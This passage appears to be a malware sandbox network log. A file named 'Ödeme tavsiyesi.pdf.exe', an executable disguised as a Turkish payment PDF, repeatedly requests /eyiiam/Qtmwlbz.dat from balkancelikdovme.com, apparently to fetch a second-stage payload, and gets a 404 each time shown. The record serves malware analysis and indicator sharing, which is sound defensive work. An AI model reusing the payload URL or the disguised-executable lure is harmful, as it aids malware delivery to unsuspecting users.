      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      6192.168.2.749707185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:54 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:55 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:55 GMT
      vary: User-Agent
      2024-12-16 13:17:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.749713185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:56 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:57 GMT
      vary: User-Agent
      2024-12-16 13:17:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.749719185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:17:58 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:17:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:17:58 GMT
      vary: User-Agent
      2024-12-16 13:17:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      9192.168.2.749727185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:00 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:00 GMT
      vary: User-Agent
      2024-12-16 13:18:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      10192.168.2.749734185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:02 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:02 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:02 GMT
      vary: User-Agent
      2024-12-16 13:18:02 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      11192.168.2.749741185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:04 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:04 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:04 GMT
      vary: User-Agent
      2024-12-16 13:18:04 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      12192.168.2.749743185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:06 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:06 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:06 GMT
      vary: User-Agent
      2024-12-16 13:18:06 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      13192.168.2.749748185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:07 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:08 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:08 GMT
      vary: User-Agent
      2024-12-16 13:18:08 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      14192.168.2.749753185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:09 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:10 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:10 GMT
      vary: User-Agent
      2024-12-16 13:18:10 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      15192.168.2.749759185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:11 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:12 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:12 GMT
      vary: User-Agent
      2024-12-16 13:18:12 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      16192.168.2.749765185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:13 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:14 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:14 GMT
      vary: User-Agent
      2024-12-16 13:18:14 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      17192.168.2.749771185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:15 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:16 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:15 GMT
      vary: User-Agent
      2024-12-16 13:18:16 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      18192.168.2.749776185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:17 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:18 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:17 GMT
      vary: User-Agent
      2024-12-16 13:18:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      19192.168.2.749781185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:19 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:19 GMT
      vary: User-Agent
      2024-12-16 13:18:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      20192.168.2.749787185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:21 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
